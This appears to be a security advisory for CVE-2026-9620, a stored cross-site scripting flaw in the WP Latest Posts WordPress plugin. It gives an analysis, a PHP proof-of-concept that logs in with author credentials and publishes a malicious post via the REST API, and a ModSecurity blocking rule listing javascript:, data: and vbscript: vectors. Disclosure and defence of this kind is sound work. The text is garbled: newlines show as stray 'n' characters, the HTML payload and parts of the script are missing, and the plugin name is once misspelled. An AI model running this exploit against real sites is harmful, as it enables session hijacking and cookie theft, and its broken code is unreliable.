CVE-2026-9620: WP Latest Posts <= 5.0.11 Authenticated (Author+) Stored Cross-Site Scripting via Post Content Image src Attribute PoC, Patch Analysis & Rule

{
“analysis”: “Atomic Edge analysis of CVE-2026-9620 (metadata-based): This vulnerability affects the WP Latest Posts plugin for WordPress versions up to 5.0.11. It allows authenticated attackers with author-level access or higher to inject stored cross-site scripting (XSS) via crafted image src attributes in post content. The CVSS score is 6.4, reflecting medium severity with network exploitation, low complexity, and a scope change.nnThe root cause lies in the plugin’s field() and loop() functions. These functions extract the raw src attribute from tags in post_content using a regular expression. They then reconstruct new elements or CSS background-image declarations by directly concatenating the unescaped value. This bypasses WordPress’s kses content filtering entirely. Atomic Edge analysis infers that the plugin does not use WordPress functions like esc_url() or esc_attr() on the extracted src value before outputting it. The CWE-79 classification confirms this is an input neutralization failure during page generation.nnExploitation requires an attacker with author-level capabilities to create or edit a post. The attacker crafts a post that contains an tag with a malicious src attribute. The payload might look like: or a more sophisticated vector using onerror or data URIs. When WP Latest Processes displays this post (via a widget or shortcode), the plugin extracts the src value and outputs it without sanitization, causing script execution in the browser of any user viewing the page. The attack vector is the plugin’s content processing, not a specific AJAX endpoint.nnRemediation requires the plugin to properly escape the src attribute value before output. The fix should use WordPress’s esc_url() for URL contexts or esc_attr() for HTML attribute contexts. Additionally, the plugin should avoid raw regex extraction from post_content and instead rely on WordPress’s built-in content filtering functions (like wp_kses_post) to handle HTML safely. Since no patched version exists, site administrators should disable the plugin or restrict author-level access pending a fix.nnSuccessful exploitation allows execution of arbitrary JavaScript in the context of any user viewing a page that displays the infected post content. This can lead to session hijacking, cookie theft, phishing attacks, or defacement. Because the XSS is stored, the payload persists and affects all visitors, including administrators, potentially enabling privilege escalation via forged requests.”,
“poc_php”: “<?phpn// Atomic Edge CVE Research – Proof of Concept (metadata-based)n// CVE-2026-9620 – WP Latest Posts $username,n ‘pwd’ => $password,n ‘wp-submit’ => ‘Log In’,n ‘redirect_to’ => $target_url . ‘/wp-admin/’,n ‘testcookie’ => 1n);nn$ch = curl_init();ncurl_setopt($ch, CURLOPT_URL, $login_url);ncurl_setopt($ch, CURLOPT_POST, true);ncurl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));ncurl_setopt($ch, CURLOPT_COOKIEJAR, ‘/tmp/cookies.txt’);ncurl_setopt($ch, CURLOPT_COOKIEFILE, ‘/tmp/cookies.txt’);ncurl_setopt($ch, CURLOPT_RETURNTRANSFER, true);ncurl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);ncurl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);ncurl_setopt($ch, CURLOPT_USERAGENT, ‘Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36’);n$response = curl_exec($ch);nn// Step 2: Get the WP nonce and post editor URLn$admin_ajax = $target_url . ‘/wp-admin/admin-ajax.php’;nn// Step 3: Create a new post with XSS payload in image srcn// The payload: an img tag with a javascript: URI in the src attributen$post_title = ‘Atomic Edge PoC CVE-2026-9620’;n$post_content = ‘

Sample text

‘;nn// Use WordPress REST API to create the post (author level has permission)n$rest_url = $target_url . ‘/wp-json/wp/v2/posts’;nn$post_data = array(n ‘title’ => $post_title,n ‘content’ => $post_content,n ‘status’ => ‘publish’n);nn$json_data = json_encode($post_data);nncurl_setopt($ch, CURLOPT_URL, $rest_url);ncurl_setopt($ch, CURLOPT_POST, true);ncurl_setopt($ch, CURLOPT_POSTFIELDS, $json_data);ncurl_setopt($ch, CURLOPT_HTTPHEADER, array(n ‘Content-Type: application/json’,n ‘Content-Length: ‘ . strlen($json_data)n));ncurl_setopt($ch, CURLOPT_COOKIEJAR, ‘/tmp/cookies.txt’);ncurl_setopt($ch, CURLOPT_COOKIEFILE, ‘/tmp/cookies.txt’);ncurl_setopt($ch, CURLOPT_RETURNTRANSFER, true);ncurl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);n$response = curl_exec($ch);nn$response_data = json_decode($response, true);nif (isset($response_data[‘id’])) {n echo “[+] Post created successfully. Post ID: ” . $response_data[‘id’] . “\n”;n echo “[+] Visit the post to trigger XSS: ” . $response_data[‘link’] . “\n”;n echo “[+] If WP Latest Posts displays this post, the XSS will execute.\n”;n} else {n echo “[-] Failed to create post. Check credentials or permissions.\n”;n echo “Response: ” . $response . “\n”;n}nncurl_close($ch);n?>n”,
“modsecurity_rule”: “# Atomic Edge WAF Rule – CVE-2026-9620 (metadata-based)n# Block stored XSS via crafted image src in post contentn# This rule targets the REST API endpoint used for creating/updating posts with malicious src attributesnSecRule REQUEST_URI “@beginsWith /wp-json/wp/v2/posts” \n “id:20261994,phase:2,deny,status:403,chain,msg:’CVE-2026-9620 Stored XSS via WP Latest Posts image src’,severity:’CRITICAL’,tag:’CVE-2026-9620′”n SecRule REQUEST_METHOD “@streq POST” “chain”n SecRule ARGS:content “@rx ]*src\s*=\s*[‘\”]?\s*(?:javascript|data:text|vbscript|&#)”n”
}